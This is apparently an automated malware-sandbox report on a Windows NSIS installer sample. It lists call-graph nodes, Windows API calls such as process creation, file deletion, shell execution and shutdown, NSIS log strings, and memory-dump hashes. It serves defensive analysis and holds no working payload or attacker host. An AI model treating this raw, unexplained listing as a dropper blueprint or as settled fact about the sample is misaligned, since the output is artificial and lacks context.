4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 
3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 
CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 
4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 
406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 
4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

Control-flow Graph

[Figure: control-flow graph 0, function 4050f9-405114; legend: Executed / Not Executed]
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                      • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                                      Control-flow Graph

[Figure: control-flow graph beginning at block 4038af-403945; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                                                                                                                                                      Control-flow Graph

[Figure: control-flow graph beginning at block 406301-406315; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                      • String ID: jF
                                                                                                                                                                                                                                                                                      • API String ID: 2295610775-3349280890

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 310444273-0

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
